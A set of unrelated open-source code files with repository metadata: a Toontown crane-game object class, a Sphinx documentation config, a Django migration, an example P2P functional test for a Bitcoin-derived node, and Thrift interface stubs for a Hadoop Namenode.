        self.accept(self.collideName + '-goon', self.__hitGoon)
        # acceptOnce: only the first boss-head hit per activation counts.
        self.acceptOnce(self.collideName + '-headTarget', self.__hitBoss)
        self.accept(self.collideName + '-dropPlane', self.__hitDropPlane)
def deactivatePhysics(self):
    """Detach from the physics manager and stop listening for collision events."""
    if self.physicsActivated:
        self.boss.physicsMgr.removePhysicalNode(self.node())
        base.cTrav.removeCollider(self.collisionNodePath)
        self.physicsActivated = 0
        self.ignore(self.collideName + '-floor')
        self.ignore(self.collideName + '-goon')
        self.ignore(self.collideName + '-headTarget')
        self.ignore(self.collideName + '-dropPlane')
def hideShadows(self):
    """Subclass hook invoked when the object is grabbed or dropped.

    The base implementation does nothing.
    """
def showShadows(self):
    """Counterpart to hideShadows(), invoked when control of the object
    is released.

    The base implementation does nothing.
    """
def stashCollisions(self):
    """Temporarily remove this object's collision geometry from the scene."""
    self.collisionNodePath.stash()
def unstashCollisions(self):
    """Restore the collision geometry removed by stashCollisions()."""
    self.collisionNodePath.unstash()
def __hitFloor(self, entry):
    # Collision callback: the falling object touched the floor.
    # Only meaningful while in a dropped state; report it and start sliding.
    if self.state == 'Dropped' or self.state == 'LocalDropped':
        self.d_hitFloor()
        self.demand('SlidingFloor', localAvatar.doId)
def __hitGoon(self, entry):
    # Collision callback: the falling object touched a goon.
    if self.state == 'Dropped' or self.state == 'LocalDropped':
        # The goon's doId is stored as a net tag on its collision geometry.
        goonId = int(entry.getIntoNodePath().getNetTag('doId'))
        goon = self.cr.doId2do.get(goonId)
        if goon:
            self.doHitGoon(goon)
def doHitGoon(self, goon):
    """React to this object colliding with *goon*.

    The base implementation ignores the hit; subclasses may override.
    """
def __hitBoss(self, entry):
    # Collision callback: the object touched the boss's head target while
    # falling, and it wasn't the boss itself that "dropped" it.
    if (self.state == 'Dropped' or self.state == 'LocalDropped') and self.craneId != self.boss.doId:
        vel = self.physicsObject.getVelocity()
        # Express velocity in the crane's frame; after normalizing,
        # component 1 (y) measures how squarely the object was moving
        # toward the boss.
        vel = self.crane.root.getRelativeVector(render, vel)
        vel.normalize()
        impact = vel[1]
        if impact >= self.getMinImpact():
            print 'hit! %s' % impact
            self.hitBossSoundInterval.start()
            self.doHitBoss(impact)
        else:
            self.touchedBossSoundInterval.start()
            print '--not hard enough: %s' % impact
def doHitBoss(self, impact):
    """Handle a sufficiently hard hit on the boss by reporting it to the AI."""
    self.d_hitBoss(impact)
def __hitDropPlane(self, entry):
    # Collision callback: the object fell through the world's kill plane.
    self.notify.info('%s fell out of the world.' % self.doId)
    self.fellOut()
def fellOut(self):
    """Handle the object falling out of the world (through the drop plane).

    The base class has no sensible recovery, so this always raises;
    subclasses are expected to override it.
    """
    # Fixes: typo in the error message ('unimplented') and the Python-2-only
    # 'raise Exc, arg' statement form; the call form works in Py2 and Py3.
    raise StandardError('fellOut unimplemented')
def getMinImpact(self):
    """Return the minimum normalized impact needed to register a boss hit.

    The base implementation accepts any impact (threshold 0); subclasses
    may raise it.
    """
    return 0
def __watchDrift(self, task):
    # Per-frame task: once the object has (almost) stopped sliding in the
    # horizontal plane, tell the AI it is free and enter Free locally.
    v = self.physicsObject.getVelocity()
    if abs(v[0]) < 0.0001 and abs(v[1]) < 0.0001:
        self.d_requestFree()
        self.demand('Free')
    return Task.cont
def prepareGrab(self):
    """Subclass hook run just before a crane picks this object up.

    The base implementation does nothing.
    """
def prepareRelease(self):
    """Subclass hook run just before a crane lets this object go.

    The base implementation does nothing.
    """
def setBossCogId(self, bossCogId):
    # Distributed field setter: remember the boss's doId and resolve it to
    # the local boss object (required before any FSM transition; see
    # defaultFilter).
    self.bossCogId = bossCogId
    self.boss = base.cr.doId2do[bossCogId]
def setObjectState(self, state, avId, craneId):
    # Distributed field setter: a one-letter state code from the AI drives
    # the local FSM (G=Grabbed, D=Dropped, s=SlidingFloor, F=Free).
    if state == 'G':
        self.demand('Grabbed', avId, craneId)
    elif state == 'D':
        if self.state != 'Dropped':
            self.demand('Dropped', avId, craneId)
    elif state == 's':
        if self.state != 'SlidingFloor':
            self.demand('SlidingFloor', avId)
    elif state == 'F':
        self.demand('Free')
    else:
        self.notify.error('Invalid state from AI: %s' % state)
def d_requestGrab(self):
    """Ask the AI for permission to grab this object."""
    self.sendUpdate('requestGrab')
def rejectGrab(self):
    # The AI refused our grab request; undo the optimistic local grab by
    # falling back to a locally-dropped state.
    if self.state == 'LocalGrabbed':
        self.demand('LocalDropped', self.avId, self.craneId)
def d_requestDrop(self):
    """Ask the AI to drop this object."""
    self.sendUpdate('requestDrop')
def d_hitFloor(self):
    """Report to the AI that this object hit the floor."""
    self.sendUpdate('hitFloor')
def d_requestFree(self):
    """Tell the AI the object has come to rest, reporting its final pose."""
    pose = [self.getX(), self.getY(), self.getZ(), self.getH()]
    self.sendUpdate('requestFree', pose)
def d_hitBoss(self, impact):
    """Report to the AI that the object struck the boss with *impact*."""
    self.sendUpdate('hitBoss', [impact])
def defaultFilter(self, request, args):
    """FSM filter: refuse every transition until the boss reference is set.

    setBossCogId() fills in self.boss; before that, state handlers would
    dereference a missing boss, so deny the request outright.
    """
    # Fixes: identity comparison with None (PEP 8 'is None' instead of
    # '== None') and the Python-2-only 'raise Exc, arg' statement form;
    # the call form behaves identically in Py2 and Py3.
    if self.boss is None:
        raise FSM.RequestDenied(request)
    return FSM.FSM.defaultFilter(self, request, args)
def enterOff(self):
    # Inert state: remove the node from the scene graph and finish any
    # running lerp interval.
    self.detachNode()
    if self.lerpInterval:
        self.lerpInterval.finish()
        self.lerpInterval = None
    return
def exitOff(self):
    # Any live state puts the object back into the visible scene graph.
    self.reparentTo(render)
def enterLocalGrabbed(self, avId, craneId):
    # Optimistic local grab: show the grab immediately, before the AI
    # has confirmed it (see enterGrabbed / rejectGrab).
    self.avId = avId
    self.craneId = craneId
    self.crane = self.cr.doId2do.get(craneId)
    self.hideShadows()
    self.prepareGrab()
    self.crane.grabObject(self)
def exitLocalGrabbed(self):
    # If the AI confirmed the grab (-> Grabbed) we keep holding on;
    # for any other transition, undo the optimistic grab.
    if self.newState != 'Grabbed':
        self.crane.dropObject(self)
        self.prepareRelease()
        del self.crane
        self.showShadows()
def enterGrabbed(self, avId, craneId):
    # AI-confirmed grab. If we had already locally grabbed with the same
    # crane there is nothing more to do; a different crane means the
    # local grab must first be undone.
    if self.oldState == 'LocalGrabbed':
        if craneId == self.craneId:
            return
        else:
            self.crane.dropObject(self)
            self.prepareRelease()
    self.avId = avId
    self.craneId = craneId
    self.crane = self.cr.doId2do.get(craneId)
    self.hideShadows()
    self.prepareGrab()
    self.crane.grabObject(self)
def exitGrabbed(self):
    # Release the object from the crane and restore its shadows.
    self.crane.dropObject(self)
    self.prepareRelease()
    self.showShadows()
    del self.crane
def enterLocalDropped(self, avId, craneId):
    # Optimistic local drop: simulate the fall locally (broadcasting our
    # position) until the AI confirms with Dropped/SlidingFloor.
    self.avId = avId
    self.craneId = craneId
    self.crane = self.cr.doId2do.get(craneId)
    self.activatePhysics()
    self.startPosHprBroadcast()
    self.hideShadows()
    # Frictionless while airborne.
    self.handler.setStaticFrictionCoef(0)
    self.handler.setDynamicFrictionCoef(0)
def exitLocalDropped(self):
    # Keep physics running if we're heading into SlidingFloor/Dropped
    # (those states re-enable what they need); otherwise shut it down.
    if self.newState != 'SlidingFloor' and self.newState != 'Dropped':
        self.deactivatePhysics()
    self.stopPosHprBroadcast()
    del self.crane
    self.showShadows()
def enterDropped(self, avId, craneId):
    # AI-confirmed drop. The avatar that dropped the object simulates the
    # physics and broadcasts its position; everyone else just smooths the
    # broadcast positions.
    self.avId = avId
    self.craneId = craneId
    self.crane = self.cr.doId2do.get(craneId)
    if self.avId == base.localAvatar.doId:
        self.activatePhysics()
        self.startPosHprBroadcast()
        # Frictionless while airborne.
        self.handler.setStaticFrictionCoef(0)
        self.handler.setDynamicFrictionCoef(0)
    else:
        self.startSmooth()
    self.hideShadows()
def exitDropped(self):
    if self.avId == base.localAvatar.doId:
        # Physics stays on if we're transitioning into SlidingFloor.
        if self.newState != 'SlidingFloor':
            self.deactivatePhysics()
        self.stopPosHprBroadcast()
    else:
        self.stopSmooth()
    del self.crane
    self.showShadows()
def enterSlidingFloor(self, avId):
    # The object hit the floor and is sliding to a stop. The controlling
    # avatar simulates it with floor friction and (optionally) watches
    # for it to come to rest; everyone else just smooths.
    self.avId = avId
    if self.lerpInterval:
        self.lerpInterval.finish()
        self.lerpInterval = None
    if self.avId == base.localAvatar.doId:
        self.activatePhysics()
        self.startPosHprBroadcast()
        self.handler.setStaticFrictionCoef(0.9)
        self.handler.setDynamicFrictionCoef(0.5)
        if self.wantsWatchDrift:
            taskMgr.add(self.__watchDrift, self.watchDriftName)
    else:
        self.startSmooth()
    self.hitFloorSoundInterval.start()
    return
def exitSlidingFloor(self):
    if self.avId == base.localAvatar.doId:
        # Stop watching for drift and shut down the local simulation.
        taskMgr.remove(self.watchDriftName)
        self.deactivatePhysics()
        self.stopPosHprBroadcast()
    else:
        self.stopSmooth()
def enterFree(self):
    """FSM state: nobody controls the object; clear ownership ids."""
    self.avId = self.craneId = 0
def exitFree(self):
    """Leave the Free state; nothing to undo."""
|
{
"content_hash": "ee5ee67158265ff30371fe7a365f3b82",
"timestamp": "",
"source": "github",
"line_count": 322,
"max_line_length": 168,
"avg_line_length": 34.08385093167702,
"alnum_prop": 0.6152164009111617,
"repo_name": "linktlh/Toontown-journey",
"id": "9928e8211ddca13c4e9263f475b2cc77d6ef48e3",
"size": "10975",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "toontown/coghq/DistributedCashbotBossObject.py",
"mode": "33261",
"license": "apache-2.0",
"language": [],
"symlink_target": ""
}
|
# Sphinx build configuration for the Python DemoPackaging documentation.
import sys
import os
# If extensions (or modules to document with autodoc) are in another
# directory, add these directories to sys.path here. If the directory is
# relative to the documentation root, use os.path.abspath to make it
# absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# Get the project root dir, which is the parent dir of this
cwd = os.getcwd()
project_root = os.path.dirname(cwd)
# Insert the project root dir as the first element in the PYTHONPATH.
# This lets us ensure that the source package is imported, and that its
# version is used.
sys.path.insert(0, project_root)
import python_demopackaging
# -- General configuration ---------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.viewcode']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Python DemoPackaging'
copyright = u"2017, siva"
# The version info for the project you're documenting, acts as replacement
# for |version| and |release|, also used in various other places throughout
# the built documents.
#
# The short X.Y version.
version = python_demopackaging.__version__
# The full version, including alpha/beta/rc tags.
release = python_demopackaging.__version__
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to
# some non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built
# documents.
#keep_warnings = False
# -- Options for HTML output -------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a
# theme further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as
# html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the
# top of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon
# of the docs. This file should be a Windows icon file (.ico) being
# 16x16 or 32x32 pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets)
# here, relative to this directory. They are copied after the builtin
# static files, so a file named "default.css" will overwrite the builtin
# "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page
# bottom, using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names
# to template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer.
# Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer.
# Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages
# will contain a <link> tag referring to it. The value of this option
# must be the base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'python_demopackagingdoc'
# -- Options for LaTeX output ------------------------------------------
latex_elements = {
    # The paper size ('letterpaper' or 'a4paper').
    #'papersize': 'letterpaper',
    # The font size ('10pt', '11pt' or '12pt').
    #'pointsize': '10pt',
    # Additional stuff for the LaTeX preamble.
    #'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass
# [howto/manual]).
latex_documents = [
    ('index', 'python_demopackaging.tex',
     u'Python DemoPackaging Documentation',
     u'siva', 'manual'),
]
# The name of an image file (relative to this directory) to place at
# the top of the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings
# are parts, not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
    ('index', 'python_demopackaging',
     u'Python DemoPackaging Documentation',
     [u'siva'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ----------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
    ('index', 'python_demopackaging',
     u'Python DemoPackaging Documentation',
     u'siva',
     'python_demopackaging',
     'One line description of project.',
     'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
|
{
"content_hash": "845870bad6c484216bccf61bb2a5ee8d",
"timestamp": "",
"source": "github",
"line_count": 260,
"max_line_length": 76,
"avg_line_length": 31.034615384615385,
"alnum_prop": 0.7055397199157268,
"repo_name": "sivakumar105/Python-DemoPackaging",
"id": "3f1a41f3f7e38a684d26b998e8570a3ffb9c4bb6",
"size": "8524",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "docs/conf.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "2347"
},
{
"name": "Python",
"bytes": "6188"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    """Redefine profile.location as a CharField with a default and blank=True."""

    dependencies = [
        ('profiles', '0004_profile_job'),
    ]

    operations = [
        migrations.AlterField(
            model_name='profile',
            name='location',
            # The bytes default (b'...') is a Python 2 artifact; kept as-is
            # for migration-history stability.
            field=models.CharField(default=b'My location', max_length=1200, blank=True),
        ),
    ]
|
{
"content_hash": "b4a0e5f19e8dd728c2119eacd0ddfca9",
"timestamp": "",
"source": "github",
"line_count": 18,
"max_line_length": 88,
"avg_line_length": 22.944444444444443,
"alnum_prop": 0.6053268765133172,
"repo_name": "suzp1984/django-tutorial",
"id": "a61f0eddbc5443716ef7b7f73ae2827b214ef843",
"size": "437",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tryDjango/profiles/migrations/0005_auto_20150924_1438.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "42439"
},
{
"name": "HTML",
"bytes": "21"
},
{
"name": "JavaScript",
"bytes": "77703"
},
{
"name": "Python",
"bytes": "8157"
}
],
"symlink_target": ""
}
|
"""An example functional test
The module-level docstring should include a high-level description of
what the test is doing. It's the first thing people see when they open
the file and should give the reader information about *what* the test
is testing and *how* it's being tested
"""
# Imports should be in PEP8 ordering (std library first, then third party
# libraries then local imports).
from collections import defaultdict
# Avoid wildcard * imports if possible
from test_framework.blocktools import (create_block, create_coinbase)
from test_framework.mininode import (
CInv,
NetworkThread,
NodeConn,
NodeConnCB,
mininode_lock,
msg_block,
msg_getdata,
wait_until,
)
from test_framework.test_framework import StatusquoTestFramework
from test_framework.util import (
assert_equal,
connect_nodes,
p2p_port,
)
# NodeConnCB is a class containing callbacks to be executed when a P2P
# message is received from the node-under-test. Subclass NodeConnCB and
# override the on_*() methods if you need custom behaviour.
class BaseNode(NodeConnCB):
    """P2P callback handler used by this example test.

    Overrides on_block() to count received blocks and on_inv() to do nothing.
    """
    def __init__(self):
        """Initialize the NodeConnCB

        Used to initialize custom properties for the Node that aren't
        included by default in the base class. Be aware that the NodeConnCB
        base class already stores a counter for each P2P message type and the
        last received message of each type, which should be sufficient for the
        needs of most tests.

        Call super().__init__() first for standard initialization and then
        initialize custom properties."""
        super().__init__()
        # Stores a dictionary of all blocks received
        self.block_receive_map = defaultdict(int)

    def on_block(self, conn, message):
        """Override the standard on_block callback

        Store the hash of a received block in the dictionary."""
        message.block.calc_sha256()
        self.block_receive_map[message.block.sha256] += 1

    def on_inv(self, conn, message):
        """Override the standard on_inv callback"""
        pass
def custom_function():
    """Placeholder for free-standing custom test behaviour.

    If this function is more generally useful for other tests, consider
    moving it to a module in test_framework.
    """
    # Note: self.log is only available on the test framework instance, so
    # no logging can happen from a module-level function like this one.
class ExampleTest(StatusquoTestFramework):
    """Example functional test: mines blocks via P2P and checks propagation."""
    # Each functional test is a subclass of the StatusquoTestFramework class.
    # Override the __init__(), add_options(), setup_chain(), setup_network()
    # and setup_nodes() methods to customize the test setup as required.

    def __init__(self):
        """Initialize the test

        Call super().__init__() first, and then override any test parameters
        for your individual test."""
        super().__init__()
        self.setup_clean_chain = True
        self.num_nodes = 3
        # Use self.extra_args to change command-line arguments for the nodes
        self.extra_args = [[], ["-logips"], []]
        # self.log.info("I've finished __init__") # Oops! Can't run self.log before run_test()

    # Use add_options() to add specific command-line options for your test.
    # In practice this is not used very much, since the tests are mostly written
    # to be run in automated environments without command-line options.
    # def add_options()
    #     pass

    # Use setup_chain() to customize the node data directories. In practice
    # this is not used very much since the default behaviour is almost always
    # fine
    # def setup_chain():
    #     pass

    def setup_network(self):
        """Setup the test network topology

        Often you won't need to override this, since the standard network topology
        (linear: node0 <-> node1 <-> node2 <-> ...) is fine for most tests.

        If you do override this method, remember to start the nodes, assign
        them to self.nodes, connect them and then sync."""
        self.setup_nodes()
        # In this test, we're not connecting node2 to node0 or node1. Calls to
        # sync_all() should not include node2, since we're not expecting it to
        # sync.
        connect_nodes(self.nodes[0], 1)
        self.sync_all([self.nodes[0:1]])

    # Use setup_nodes() to customize the node start behaviour (for example if
    # you don't want to start all nodes at the start of the test).
    # def setup_nodes():
    #     pass

    def custom_method(self):
        """Do some custom behaviour for this test

        Define it in a method here because you're going to use it repeatedly.
        If you think it's useful in general, consider moving it to the base
        StatusquoTestFramework class so other tests can use it."""
        self.log.info("Running custom_method")

    def run_test(self):
        """Main test logic"""
        # Create a P2P connection to one of the nodes
        node0 = BaseNode()
        connections = []
        connections.append(NodeConn('127.0.0.1', p2p_port(0), self.nodes[0], node0))
        node0.add_connection(connections[0])

        # Start up network handling in another thread. This needs to be called
        # after the P2P connections have been created.
        NetworkThread().start()
        # wait_for_verack ensures that the P2P connection is fully up.
        node0.wait_for_verack()

        # Generating a block on one of the nodes will get us out of IBD
        blocks = [int(self.nodes[0].generate(nblocks=1)[0], 16)]
        self.sync_all([self.nodes[0:1]])

        # Notice above how we called an RPC by calling a method with the same
        # name on the node object. Notice also how we used a keyword argument
        # to specify a named RPC argument. Neither of those are defined on the
        # node object. Instead there's some __getattr__() magic going on under
        # the covers to dispatch unrecognised attribute calls to the RPC
        # interface.

        # Logs are nice. Do plenty of them. They can be used in place of comments for
        # breaking the test into sub-sections.
        self.log.info("Starting test!")

        self.log.info("Calling a custom function")
        custom_function()

        self.log.info("Calling a custom method")
        self.custom_method()

        self.log.info("Create some blocks")
        self.tip = int(self.nodes[0].getbestblockhash(), 16)
        self.block_time = self.nodes[0].getblock(self.nodes[0].getbestblockhash())['time'] + 1
        height = 1
        for i in range(10):
            # Use the mininode and blocktools functionality to manually build a block
            # Calling the generate() rpc is easier, but this allows us to exactly
            # control the blocks and transactions.
            block = create_block(self.tip, create_coinbase(height), self.block_time)
            block.solve()
            block_message = msg_block(block)
            # Send message is used to send a P2P message to the node over our NodeConn connection
            node0.send_message(block_message)
            self.tip = block.sha256
            blocks.append(self.tip)
            self.block_time += 1
            height += 1

        self.log.info("Wait for node1 to reach current tip (height 11) using RPC")
        self.nodes[1].waitforblockheight(11)

        self.log.info("Connect node2 and node1")
        connect_nodes(self.nodes[1], 2)

        self.log.info("Add P2P connection to node2")
        node2 = BaseNode()
        connections.append(NodeConn('127.0.0.1', p2p_port(2), self.nodes[2], node2))
        node2.add_connection(connections[1])
        node2.wait_for_verack()

        self.log.info("Wait for node2 reach current tip. Test that it has propogated all the blocks to us")
        getdata_request = msg_getdata()
        for block in blocks:
            getdata_request.inv.append(CInv(2, block))
        node2.send_message(getdata_request)

        # wait_until() will loop until a predicate condition is met. Use it to test properties of the
        # NodeConnCB objects.
        assert wait_until(lambda: sorted(blocks) == sorted(list(node2.block_receive_map.keys())), timeout=5)

        self.log.info("Check that each block was received only once")
        # The network thread uses a global lock on data access to the NodeConn objects when sending and receiving
        # messages. The test thread should acquire the global lock before accessing any NodeConn data to avoid locking
        # and synchronization issues. Note wait_until() acquires this global lock when testing the predicate.
        with mininode_lock:
            for block in node2.block_receive_map.values():
                assert_equal(block, 1)
# Entry point: run the example test directly when executed as a script.
if __name__ == '__main__':
    ExampleTest().main()
|
{
"content_hash": "a4d1619c607f43541e2f6e895b2eaba4",
"timestamp": "",
"source": "github",
"line_count": 219,
"max_line_length": 118,
"avg_line_length": 39.96803652968037,
"alnum_prop": 0.6568033816977037,
"repo_name": "Exgibichi/statusquo",
"id": "2e8a07462ea097481ec61537811a8207ff5ba8da",
"size": "8962",
"binary": false,
"copies": "1",
"ref": "refs/heads/0.15",
"path": "test/functional/example_test.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Assembly",
"bytes": "28452"
},
{
"name": "C",
"bytes": "693663"
},
{
"name": "C++",
"bytes": "5234740"
},
{
"name": "HTML",
"bytes": "21860"
},
{
"name": "Java",
"bytes": "30306"
},
{
"name": "M4",
"bytes": "193642"
},
{
"name": "Makefile",
"bytes": "113698"
},
{
"name": "Objective-C",
"bytes": "3782"
},
{
"name": "Objective-C++",
"bytes": "7244"
},
{
"name": "Protocol Buffer",
"bytes": "2336"
},
{
"name": "Python",
"bytes": "1209225"
},
{
"name": "QMake",
"bytes": "758"
},
{
"name": "Shell",
"bytes": "57764"
}
],
"symlink_target": ""
}
|
from thrift.Thrift import *
import hadoop.api.common.HadoopServiceBase
from ttypes import *
from thrift.Thrift import TProcessor
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol, TProtocol
try:
from thrift.protocol import fastbinary
except:
fastbinary = None
# NOTE(review): this class matches Thrift-compiler codegen style (stub
# interface methods with docstrings and pass bodies); avoid hand-editing
# generated files — regenerate from the .thrift IDL instead.
class Iface(hadoop.api.common.HadoopServiceBase.Iface):
    """
    Provides an interface to a Hadoop Namenode. It is basically a Thrift
    translation of org.apache.hadoop.hdfs.protocol.ClientProtocol.
    """
    def chmod(self, ctx, path, perms):
        """
        Set permissions of an existing file or directory.

        Parameters:
         - ctx
         - path: Path of the file or directory.
         - perms: New permissions for the file or directory.
        """
        pass

    def chown(self, ctx, path, owner, group):
        """
        Set owner of a file or directory.

        If either parameter 'owner' or 'group' is set to null, that
        parameter is left unchanged.

        Parameters 'owner' and 'group' cannot be both null.

        Parameters:
         - ctx
         - path: Path to the file or directory
         - owner: New owner.
         - group: New group.
        """
        pass

    def df(self, ctx):
        """
        Return a list containing:
        (index 0) The total storage capacity of the file system (in bytes).
        (index 1) The total used space of the file system (in bytes).
        (index 2) The available storage of the file system (in bytes).

        Parameters:
         - ctx
        """
        pass

    def enterSafeMode(self, ctx):
        """
        Enter safe mode.

        Parameters:
         - ctx
        """
        pass

    def getBlocks(self, ctx, path, offset, length):
        """
        Get a list of all blocks containing a region of a file

        Parameters:
         - ctx
         - path: Path to the file.
         - offset: Offset of the region.
         - length: Length of the region
        """
        pass

    def getPreferredBlockSize(self, ctx, path):
        """
        Get the preferred block size for the given file.

        The path must exist, or common.IOException is thrown.

        Parameters:
         - ctx
         - path: Path to the file.
        """
        pass

    def isInSafeMode(self, ctx):
        """
        Returns whether HDFS is in safe mode or not.

        Parameters:
         - ctx
        """
        pass

    def leaveSafeMode(self, ctx):
        """
        Leave safe mode.

        Parameters:
         - ctx
        """
        pass

    def ls(self, ctx, path):
        """
        Get a listing of the indicated directory.

        Parameters:
         - ctx
         - path: Path to the directory.
        """
        pass

    def mkdirhier(self, ctx, path, perms):
        """
        Create a directory (or hierarchy of directories).

        Returns false if directory did not exist and could not be created,
        true otherwise.

        Parameters:
         - ctx
         - path: Path to the directory.
         - perms: Access permissions of the directory.
        """
        pass

    def refreshNodes(self, ctx):
        """
        Tells the name node to reread the hosts and exclude files.

        Parameters:
         - ctx
        """
        pass

    def rename(self, ctx, path, newPath):
        """
        Rename an item in the file system namespace.

        Returns true if successful, or
        false if the old name does not exist or if the new name already
        belongs to the namespace.

        Parameters:
         - ctx
         - path: Path to existing file or directory.
         - newPath: New path.
        """
        pass

    def reportBadBlocks(self, ctx, blocks):
        """
        Report corrupted blocks.

        Parameters:
         - ctx
         - blocks: List of corrupted blocks.
        """
        pass

    def stat(self, ctx, path):
        """
        Get information about a path in HDFS.

        Return value will be null if path does not exist.

        Parameters:
         - ctx
         - path: Path of the file or directory.
        """
        pass

    def getContentSummary(self, ctx, Path):
        """
        Get the summary of a directory's contents.

        Note that this has runtime linear in the total number of nodes
        in the directory tree - this can be expensive for directories
        near the top of a big HDFS. Use with care.

        Parameters:
         - ctx
         - Path
        """
        pass

    def multiGetContentSummary(self, ctx, paths):
        """
        Get ContentSummary objects for multiple directories simultaneously. The same warnings
        apply as for getContentSummary(...) above.

        Parameters:
         - ctx
         - paths
        """
        pass

    def setQuota(self, ctx, path, namespaceQuota, diskspaceQuota):
        """
        Set the quota for a directory.

        Quota parameters may have three types of values:

        (1) 0 or more: Quota will be set to that value.
        (2) QUOTA_DONT_SET: Quota will not be changed,
        (3) QUOTA_RESET: Quota will be reset.

        Any other value is a runtime error.

        Parameters:
         - ctx
         - path: Path of the directory.
         - namespaceQuota: Limit on the number of names in the directory.
         - diskspaceQuota: Limit on disk space occupied by all the files in the
        directory.
        """
        pass

    def setReplication(self, ctx, path, replication):
        """
        Set replication factor for an existing file.

        This call just updates the value of the replication factor. The actual
        block replication is not expected to be performed during this method call.
        The blocks will be populated or removed in the background as the result of
        the routine block maintenance procedures.

        Returns true if successful, false if file does not exist or is a
        directory.

        Parameters:
         - ctx
         - path: Path of the file.
         - replication: New replication factor.
        """
        pass

    def unlink(self, ctx, path, recursive):
        """
        Delete a file or directory from the file system.

        Any blocks belonging to the deleted files will be garbage-collected.

        Parameters:
         - ctx
         - path: Path of the file or directory.
         - recursive: Delete a non-empty directory recursively.
        """
        pass

    def utime(self, ctx, path, atime, mtime):
        """
        Sets the modification and access time of a file or directory.

        Setting *one single time parameter* to -1 means that time parameter
        must not be set by this call.

        Setting *both time parameters* to -1 means both of them must be set to
        the current time.

        Parameters:
         - ctx
         - path: Path of the file or directory.
         - atime: Access time in milliseconds since 1970-01-01 00:00 UTC
         - mtime: Modification time in milliseconds since 1970-01-01 00:00 UTC
        """
        pass

    def datanodeUp(self, name, storage, thriftPort):
        """
        Inform the namenode that a datanode process has started.

        Parameters:
         - name: <host name>:<port number> of the datanode
         - storage: the storage id of the datanode
         - thriftPort: Thrift port of the datanode
        """
        pass

    def datanodeDown(self, name, storage, thriftPort):
        """
        Inform the namenode that a datanode process has stopped.

        Parameters:
         - name: <host name>:<port number> of the datanode
         - storage: the storage id of the datanode
         - thriftPort: Thrift port of the datanode
        """
        pass

    def getDelegationToken(self, ctx, renewer):
        """
        Get an HDFS delegation token.

        Parameters:
         - ctx
         - renewer
        """
        pass
